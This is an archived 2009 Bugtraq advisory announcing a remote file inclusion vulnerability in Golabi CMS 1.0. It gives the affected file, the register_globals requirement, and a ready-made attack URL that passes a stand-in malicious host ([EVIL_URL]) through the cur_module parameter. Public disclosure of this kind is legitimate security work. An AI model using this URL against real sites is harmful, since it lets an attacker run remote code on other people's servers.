lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Thu, 26 Feb 2009 00:26:47 -0700 From: rezazahfaran@...il.com To: bugtraq@...urityfocus.com Subject: Golabi CMS Remote File Inclusion Vulnerability -------------------------------------------------------------------------------- [wWw.CrazyAngel.iR] - [info-AT-CrazyAngel.iR] -------------------------------------------------------------------------------- [Golabi CMS Remote File Inclusion Vulnerability] [+] Application Info: [*] Name: Golabi CMS [*] Author: R3dM0ve [*] HomePage: http://golabicms.sourceforge.net/ [*] Download: http://downloads.sourceforge.net/golabicms/Golabi_1.0.zip?use_mirror=freefr [+] Vulnerability Info: [*] Type: Remote File Inclusion (RFI) [*] Requirement: register_globals [ON] [*] Risk: High Critical [*] Bug Hunter: CrazyAngel [*] Details: Unhandled variable Inclusion in default template file results in RFI Vulnerability [*] Vul URL: [GOLABI_PATH]/templates/default/index_logged.php?main_loaded=1&cur_module=[EVIL_URL] --------------------------------------------------------------------------------
Powered by blists - more mailing lists